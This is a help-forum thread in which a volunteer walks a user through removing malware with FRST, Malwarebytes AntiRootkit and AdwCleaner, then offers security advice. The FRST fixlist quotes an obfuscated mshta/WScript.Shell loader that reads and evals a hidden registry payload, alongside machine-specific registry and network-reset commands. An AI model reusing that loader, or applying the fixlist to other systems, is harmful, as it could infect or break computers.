Help in removing malware

Hi,

Recently I’ve had my personal information stolen so I decided to download avast (had another antivirus before but want to be safe). Starting yesterday, avast started blocking a lot of activity from go.wvydeo.com so I did some research and found that it’s a malware. Could you assist me in removing the malware in my computer and could it be the leak that got my bank information stolen? Thank you so much. (I’ve attached all the preliminary logs)

Hi you will need to uninstall AVG and then run the removal tool https://support.avg.com/SupportArticleView?l=en_US&urlname=How-to-uninstall-AVG

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [**66d9dc3c<*>] => mshta javascript:i4hPyNC1P="l8";vG8=new%20ActiveXObject("WScript.Shell");t7gDiPS="tma";j7a7dm=vG8.RegRead("HKLM\\software\\Wow6432Node\\ea6c3e3e\\a6f8fd0b");hHW9sA4nUX="5Rk0pvb";eval(j7a7dm);IJS8ZkBI= (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters) ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-3046787366-2328371080-4250773792-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION BHO-x32: No Name -> {889D2FEB-5411-4565-8998-1DD2C5261283} -> No File FF HKLM\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] - C:\Program Files\Updater By SweetPacks\Firefox CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File AlternateDataStreams: C:\Windows\SysWOW64\-STARTTYPE:AUTORUN AlternateDataStreams: C:\Windows\SysWOW64\CN1AC111KY05RW:NW C:\Program Files\Updater By SweetPacks DeleteKey HKLM\software\Wow6432Node\ea6c3e3e DeleteKey: HKCU\Software\ea6c3e3e Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f RemoveProxy: CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: ipconfig /flushdns CMD: netsh winsock reset catalog CMD: netsh int ip reset c:\resetlog.txt CMD: ipconfig /release CMD: ipconfig /renew CMD: netsh int ipv4 reset CMD: netsh int ipv6 reset EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please download Malwarebytes AntiRootkit and save it to your desktop.

Full instructions how to use MBAR
Please note: This is a beta version so please be sure to read the disclaimer and note of it.

• Unzip/unrar MBAR in a folder to your Desktop and MBAM shall run …

• Click on Next > then on Update button to download fresh definitions.

https://dl.dropboxusercontent.com/u/73555776/mbar_update.JPG

• When database updates click Next

• In the following window ensure “Targets” scan for Drivers; Sectors; System are ticked. Then select “Scan button”

https://dl.dropboxusercontent.com/u/73555776/mbarscan.JPG

• If an infection/s are found ensure “Create Restore Point” is checked, then select the “Cleanup Button” to remove threats.
Or if you are sure any entries should be kept, just untick them. A list of infected files will be listed.

• The Clean up procedure will be Scheduled for process.
• When complete pop-up will show you. Select the Yes button and the system should re-boot to complete the cleaning process.

Please attach the two following logs from the mbar folder:

system-log.txt
and
mbar-log-year-month-day (hour-minute-second).txt.

Hello again,

I’ve managed to run the required programs and the logs are attached. However, my second profile appeared to have the desktop completely changed (most shortcuts and backgrounds disappeared but is accessible from administrator account). Thank you so much for your time.

Could I have another FRST scan please… Did you have to run the FRST fix multiple times ?

I did run the fix a couple of times because my computer just freezes. I have attached logs from another FRST scan

OK that explains why several elements were not found

Are you able to create the shortcuts in the second account ?

Please download AdwCleaner by Xplode onto your desktop.

[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.

I wasn’t able to create shortcuts in the second account…not even access any web browsers but my files are accessible from the administrator. I have also attached the required log.

It appears that, that account may be corrupted is there anything you need to save from it ?

Ah I see. I do have a lot of important files on it as that is my main account I use at work. Is there a way of repairing it? or should I grab everything off of the profile and then delete it? Also, should I still be concerned about malware?

I would create a new account and transfer all the data over… As it stands at the moment no malware is present that I can see… How is the computer behaving ?

The computer is certainly faster and there is no longer any malware warnings from avast. Thank you so much!

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Remove tools

Download and run Delfix
Select the options as shown

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

If you do need to keep Java then download JavaRa
Run the programme and select Remove Java Runtime. Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version

https://dl.dropboxusercontent.com/u/73555776/javara.JPG

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

Malwarebytes

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked, this is a fire and forget programme :wink:

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe :wave: